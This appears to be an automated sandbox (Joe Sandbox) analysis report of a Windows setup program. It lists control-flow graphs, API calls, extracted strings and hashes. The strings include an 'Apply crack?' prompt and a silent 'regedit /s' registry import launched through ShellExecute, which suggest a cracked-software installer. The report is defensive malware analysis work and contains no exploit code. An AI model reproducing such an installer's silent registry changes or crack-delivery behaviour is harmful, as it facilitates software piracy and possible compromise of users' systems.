                                                                                                    control_flow_graph 445 250410-25041d 446 250421-25043f LoadLibraryA 445->446 447 25041f 445->447 448 250445-250511 GetProcAddress * 7 GetDC 446->448 449 250920-250934 call 2470e0 446->449 451 250513-25051d 448->451 454 250936-25093d 449->454 451->451 453 25051f-25055e ChoosePixelFormat SetPixelFormat 451->453 455 250564-250574 453->455 456 2509e7-2509fd call 2470e0 453->456 460 250b29-250b3f call 2470e0 455->460 461 25057a-25059c 455->461 456->454 460->454 467 250a02-250a34 call 2470e0 461->467 468 2505a2-250613 461->468 467->454 478 250a39-250a40 468->478 479 250619-25062f 468->479 480 250a46-250a48 478->480 481 250940 478->481 479->481 487 250635-250652 call 23e480 479->487 488 250a4d-250a54 480->488 484 250950-250952 481->484 486 2508f0-250905 484->486 494 25090e-25091d 486->494 495 250ac5-250acc 487->495 496 250658-25066e 487->496 491 250980-250982 488->491 492 250a5a-250a5c 488->492 501 250a61-250a68 492->501 498 2509e0-2509e2 495->498 499 250ad2-250ad4 495->499 496->498 507 250674-250691 call 23e480 496->507 506 250ad9-250ae0 499->506 503 250990-250992 501->503 504 250a6e-250a70 501->504 512 250a75-250a7c 504->512 506->484 509 250ae6-250ae8 506->509 516 250697-2506ad 507->516 517 250ab1-250ab8 507->517 522 250aed-250af4 509->522 513 2509a0-2509a2 512->513 514 250a82-250a84 512->514 527 250a89-250a90 514->527 518 2509d0-2509d2 516->518 530 2506b3-2506d0 call 23e480 516->530 517->518 519 250abe-250ac0 517->519 519->495 524 250954-250956 522->524 525 250afa-250afc 522->525 528 2508c1-2508c8 524->528 535 250b01-250b08 525->535 531 250a96-250a98 527->531 532 2509b0-2509b2 527->532 528->506 533 2508ce-2508de 528->533 541 2506d6-2506ec 530->541 542 250a9d-250aa4 530->542 531->542 533->484 550 2508e0-2508eb call 23e480 533->550 539 250960-250962 535->539 540 250b0e-250b10 535->540 546 250882-250889 539->546 554 250b15-250b1c 540->554 543 2509c0-2509c2 541->543 558 2506f2-25070f call 23e480 541->558 542->543 544 250aaa-250aac 542->544 544->517 546->522 547 25088f-2508a5 546->547 547->524 561 2508ab-2508bb call 23e480 547->561 550->486 556 250970-250972 554->556 557 250b22-250b24 554->557 557->460 558->527 565 250715-25072b 558->565 561->528 565->532 569 250731-25074e call 23e480 565->569 569->512 572 250754-25076a 569->572 572->513 575 250770-25078d call 23e480 572->575 575->501 578 250793-2507a9 575->578 578->503 581 2507af-2507cc call 23e480 578->581 581->488 584 2507d2-2507e8 581->584 584->491 587 2507ee-25080b call 23e480 584->587 587->554 590 250811-250827 587->590 590->556 593 25082d-25084a call 23e480 590->593 593->535 596 250850-250866 593->596 596->539 599 25086c-25087c call 23e480 596->599 599->546
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$FormatPixel$ChooseLibraryLoad
                                                                                                    • String ID: %$($WGL: Failed to create dummy context$WGL: Failed to load opengl32.dll$WGL: Failed to make dummy context current$WGL: Failed to set pixel format for dummy context$WGL_ARB_context_flush_control$WGL_ARB_create_context$WGL_ARB_create_context_no_error$WGL_ARB_create_context_profile$WGL_ARB_create_context_robustness$WGL_ARB_framebuffer_sRGB$WGL_ARB_multisample$WGL_ARB_pixel_format$WGL_EXT_colorspace$WGL_EXT_create_context_es2_profile$WGL_EXT_framebuffer_sRGB$WGL_EXT_swap_control$opengl32.dll$wglCreateContext$wglCreateContextAttribsARB$wglDeleteContext$wglGetCurrentContext$wglGetCurrentDC$wglGetExtensionsStringARB$wglGetExtensionsStringEXT$wglGetPixelFormatAttribivARB$wglGetProcAddress$wglMakeCurrent$wglShareLists$wglSwapIntervalEXT
                                                                                                    • API String ID: 2177870187-3315370416
                                                                                                    • Opcode ID: 48e2e590b77f0b8ee6287d7a09cd5504bd2d84eafaf9602925e5d5e3790b6f39
                                                                                                    • Instruction ID: 68a37b1047da20487b06fc5a58d043376f1073f441291cd59768db79093999b5
                                                                                                    • Opcode Fuzzy Hash: 48e2e590b77f0b8ee6287d7a09cd5504bd2d84eafaf9602925e5d5e3790b6f39
                                                                                                    • Instruction Fuzzy Hash: 22F120B86243019FD740AF79DDC522A7BE4BB4A746F01483CDA8AC3216E774D458CF6A

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 602 24cbd0-24cbed 603 24cf60-24cf65 602->603 604 24cbf3-24cc49 call 249ec0 call 24a370 call 2471e0 602->604 606 24d030-24d03a 603->606 607 24cf6b-24cf88 603->607 619 24cc4f-24ccdd GetModuleHandleW CreateWindowExW free 604->619 620 24cf49-24cf55 604->620 608 24cf8d-24cfdf call 247650 606->608 607->608 614 24cfe5-24d029 608->614 615 24d300-24d321 AdjustWindowRectEx 608->615 621 24d329-24d346 AdjustWindowRectEx 615->621 622 24cf35-24cf44 call 2470e0 619->622 623 24cce3-24cd19 SetPropW call 247570 619->623 622->620 627 24cd99-24cdad 623->627 628 24cd1b-24cd96 623->628 629 24d0e0-24d0ff 627->629 630 24cdb3-24cdd3 DragAcceptFiles 627->630 628->627 634 24d105-24d13f ClientToScreen * 2 call 247650 629->634 635 24d290-24d2fb MonitorFromWindow call 249db0 629->635 632 24cdd5-24cde0 call 24ab10 630->632 633 24cdea-24cdf5 630->633 632->633 638 24cdf7-24cdff 633->638 639 24ce1b-24ce20 633->639 634->621 654 24d145-24d1c9 SetWindowPos 634->654 646 24ce05-24ce0a 638->646 647 24d1d0 call 250410 638->647 641 24cf25-24cf34 639->641 642 24ce26-24ce7e ShowWindow BringWindowToTop SetForegroundWindow SetFocus 639->642 649 24ce84-24ce8c 642->649 650 24d050-24d07e SetThreadExecutionState call 247570 642->650 652 24d210-24d217 call 251eb0 646->652 653 24ce10-24ce15 646->653 658 24d1d5-24d1d7 647->658 655 24d040 649->655 656 24ce92-24cf22 call 249b70 call 242b80 GetMonitorInfoW SetWindowPos 649->656 650->649 671 24d084-24d0d2 SystemParametersInfoW * 2 650->671 652->620 672 24d21d-24d23d call 252360 652->672 653->639 661 24d250-24d257 call 252f60 653->661 655->650 656->641 658->620 665 24d1dd-24d1fd call 250b80 658->665 661->620 674 24d25d-24d27d call 253160 661->674 665->639 680 24d203 665->680 671->649 672->639 682 24d243 672->682 674->639 684 24d283 674->684 680->620 682->620 684->620
                                                                                                    APIs
                                                                                                      • Part of subcall function 00249EC0: EnumDisplaySettingsExW.USER32 ref: 00249F11
                                                                                                      • Part of subcall function 0024A370: EnumDisplaySettingsW.USER32 ref: 0024A3B1
                                                                                                      • Part of subcall function 002471E0: MultiByteToWideChar.KERNEL32 ref: 0024721C
                                                                                                      • Part of subcall function 002471E0: calloc.MSVCRT ref: 00247232
                                                                                                      • Part of subcall function 002471E0: MultiByteToWideChar.KERNEL32 ref: 0024725C
                                                                                                    • GetModuleHandleW.KERNEL32 ref: 0024CC5A
                                                                                                    • CreateWindowExW.USER32 ref: 0024CCBA
                                                                                                    • free.MSVCRT ref: 0024CCD0
                                                                                                    • SetPropW.USER32 ref: 0024CCF2
                                                                                                      • Part of subcall function 00247570: VerSetConditionMask.KERNEL32 ref: 002475D9
                                                                                                      • Part of subcall function 00247570: VerSetConditionMask.KERNEL32 ref: 002475F5
                                                                                                      • Part of subcall function 00247570: VerSetConditionMask.KERNEL32 ref: 00247611
                                                                                                    • DragAcceptFiles.SHELL32 ref: 0024CDBE
                                                                                                    • ShowWindow.USER32 ref: 0024CE37
                                                                                                    • BringWindowToTop.USER32 ref: 0024CE49
                                                                                                    • SetForegroundWindow.USER32 ref: 0024CE5B
                                                                                                    • SetFocus.USER32 ref: 0024CE6D
                                                                                                    • GetMonitorInfoW.USER32 ref: 0024CED6
                                                                                                    • SetWindowPos.USER32 ref: 0024CF1C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ConditionMask$ByteCharDisplayEnumMultiSettingsWide$AcceptBringCreateDragFilesFocusForegroundHandleInfoModuleMonitorPropShowcallocfree
                                                                                                    • String ID: ($GLFW$GLFW30$I$Win32: Failed to create window$`
                                                                                                    • API String ID: 2978877559-4072544135
                                                                                                    • Opcode ID: 6fb4d9a32f22ed04d8290cd0cffc82c80ba0d55139c97fd2cf2410ecd080508a
                                                                                                    • Instruction ID: 7748c455b6768922603d17152173622de9f667c2560ac7e63180b9509014e0d0
                                                                                                    • Opcode Fuzzy Hash: 6fb4d9a32f22ed04d8290cd0cffc82c80ba0d55139c97fd2cf2410ecd080508a
                                                                                                    • Instruction Fuzzy Hash: 3212EEB4A193018FD754EF69C68871ABBF0BF85700F10892EE8988B355E7B5D858CF52

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • PathFileExistsW.SHLWAPI ref: 001C4D77
                                                                                                    • SHCreateDirectory.SHELL32 ref: 001C4D99
                                                                                                    • GetFullPathNameW.KERNEL32 ref: 001C4DC5
                                                                                                    • GetLastError.KERNEL32 ref: 001C4EA8
                                                                                                    • MessageBoxW.USER32 ref: 001C504F
                                                                                                      • Part of subcall function 001C24F0: GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,001C4E02), ref: 001C2512
                                                                                                      • Part of subcall function 00210260: GetModuleFileNameW.KERNEL32 ref: 002102BC
                                                                                                      • Part of subcall function 00210260: memset.MSVCRT ref: 00210369
                                                                                                      • Part of subcall function 00210260: free.MSVCRT ref: 002103FB
                                                                                                      • Part of subcall function 00210260: free.MSVCRT ref: 0021040F
                                                                                                      • Part of subcall function 00210260: free.MSVCRT ref: 0021041D
                                                                                                      • Part of subcall function 00210260: _wremove.MSVCRT ref: 00210471
                                                                                                      • Part of subcall function 00210260: free.MSVCRT ref: 00210490
                                                                                                      • Part of subcall function 00210260: free.MSVCRT ref: 002104A4
                                                                                                      • Part of subcall function 00210260: free.MSVCRT ref: 002104B2
                                                                                                      • Part of subcall function 00210260: _wremove.MSVCRT ref: 0021051C
                                                                                                      • Part of subcall function 00210260: free.MSVCRT ref: 0021053B
                                                                                                      • Part of subcall function 00210260: free.MSVCRT ref: 00210549
                                                                                                      • Part of subcall function 00210260: free.MSVCRT ref: 00210557
                                                                                                    • ShellExecuteW.SHELL32 ref: 001C509B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$FileNamePath_wremove$CreateDirectoryDiskErrorExecuteExistsFreeFullLastMessageModuleShellSpacememset
                                                                                                    • String ID: $$%ls$/s %ls$Error$InstallerThread: GetFullPathName$InstallerThread: PathFileExists$InstallerThread: VerifyDiskSpace$InstallerThread: VerifyDiskSpace: GetArchiveDataSize$InstallerThread: VerifyDiskSpace: GetFreeDiskSpace$InstallerThread: VerifyPath$InstallerThread: swprintfInvalid path.$Overwrite?$Path exists$open$regedit
                                                                                                    • API String ID: 399809809-3701533513
                                                                                                    • Opcode ID: f58acc2d8958f4292bee4e4d9453aab54cf88d42b0e47f7ed6e96e7c20a80aa3
                                                                                                    • Instruction ID: adab0050fcf353af7ba7478d26f9207a4ea8acea2401e8a0233d84617558a055
                                                                                                    • Opcode Fuzzy Hash: f58acc2d8958f4292bee4e4d9453aab54cf88d42b0e47f7ed6e96e7c20a80aa3
                                                                                                    • Instruction Fuzzy Hash: 1D81E3B410C700DFD704AF64D55872EBBF0AFA0315F42C92DE9C98A246D7B99498CB97

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 761 1c5bec-1c5c13 WaitForSingleObject 762 1c5c19-1c5c46 MessageBoxW 761->762 763 1c5cc0-1c5ce8 MessageBoxW 761->763 764 1c5c4c-1c5c73 MessageBoxW 762->764 765 1c5d20-1c5d35 762->765 766 1c5ca2-1c5cb7 ReleaseMutex 763->766 767 1c5d48-1c5d66 764->767 768 1c5c79-1c5ca0 MessageBoxW 764->768 769 1c5d39 call 1c52d0 765->769 770 1c5d6a call 1c5410 767->770 768->766 771 1c5cf0-1c5d0e 768->771 772 1c5d3e 769->772 773 1c5d6f 770->773 774 1c5d12 call 1c5680 771->774 772->764 773->768 775 1c5d17 774->775 775->766
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$MutexObjectReleaseSingleWait
                                                                                                    • String ID: $$Apply crack?$Crack$Create shortcut?$Create uninstaller?$Error$InstallFinishCallback: Installation failed. Please try again.$Shortcut$Uninstaller
                                                                                                    • API String ID: 3319316258-707245824
                                                                                                    • Opcode ID: 149b61fd809fad5ba49d22bcde964e367c8d1c12a432ed51d725fc58f8369e2d
                                                                                                    • Instruction ID: 9ba7d8268450c2cad7a41ffbb458f80f01c2cbee1b032273db19f280766d0879
                                                                                                    • Opcode Fuzzy Hash: 149b61fd809fad5ba49d22bcde964e367c8d1c12a432ed51d725fc58f8369e2d
                                                                                                    • Instruction Fuzzy Hash: 0631F1B45097009FC700EF68D68865ABBE1BB94310F52C81EE8C88B365D3B8E484DF5A

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • CreateMutexW.KERNEL32 ref: 001C6984
                                                                                                    • WaitForSingleObject.KERNEL32 ref: 001C6998
                                                                                                    • strlen.MSVCRT ref: 001C69B1
                                                                                                      • Part of subcall function 001C24A0: GetTempPathW.KERNEL32 ref: 001C24B6
                                                                                                      • Part of subcall function 001C24A0: GetTempFileNameW.KERNEL32 ref: 001C24DD
                                                                                                      • Part of subcall function 001C2540: CreateFileW.KERNEL32 ref: 001C257C
                                                                                                      • Part of subcall function 001C2540: WriteFile.KERNEL32 ref: 001C25B1
                                                                                                      • Part of subcall function 001C2540: CloseHandle.KERNEL32 ref: 001C25BF
                                                                                                    • CreateMutexW.KERNEL32 ref: 001C69F8
                                                                                                    • exit.MSVCRT ref: 001C6A1E
                                                                                                    • exit.MSVCRT ref: 001C6A36
                                                                                                    • exit.MSVCRT ref: 001C6A4E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFileexit$MutexTemp$CloseHandleNameObjectPathSingleWaitWritestrlen
                                                                                                    • String ID: %ls%ls$Init: CreateMutex$Init: WaitForSingleObject$Init: WriteTempFile
                                                                                                    • API String ID: 3709684660-1587004996
                                                                                                    • Opcode ID: 0fac774342d32cb7b81d60e1bdb34a1b7fbb3c235efb15978164cfd508179384
                                                                                                    • Instruction ID: 634ac6005dc71d3f306dda61295fd14d2fb9a66bd83faec0e5b9e8ebc24be720
                                                                                                    • Opcode Fuzzy Hash: 0fac774342d32cb7b81d60e1bdb34a1b7fbb3c235efb15978164cfd508179384
                                                                                                    • Instruction Fuzzy Hash: 2021E7B05183019BD700BF65D58979EBBE0BF60354F42C82DE8C85B241DBB8D594CF92

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Load$HandleImageModule$ClassCursorRegister
                                                                                                    • String ID: #$0$GLFW30$GLFW_ICON$Win32: Failed to register window class
                                                                                                    • API String ID: 1994909298-1599115447
                                                                                                    • Opcode ID: 1a39d3039f8d1949b5eb790aa7306c0d47d3c56fa45d4aa0720ad42ad4bd7276
                                                                                                    • Instruction ID: a312bd5a7baea2b223ac9ed7bd684f58236c98d68be8455cb78f9c26d283aa7a
                                                                                                    • Opcode Fuzzy Hash: 1a39d3039f8d1949b5eb790aa7306c0d47d3c56fa45d4aa0720ad42ad4bd7276
                                                                                                    • Instruction Fuzzy Hash: 8821F0B04193019FE780EF28D69831BBAF0EB84748F40892DE4C85B285D7B9D5588B97

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
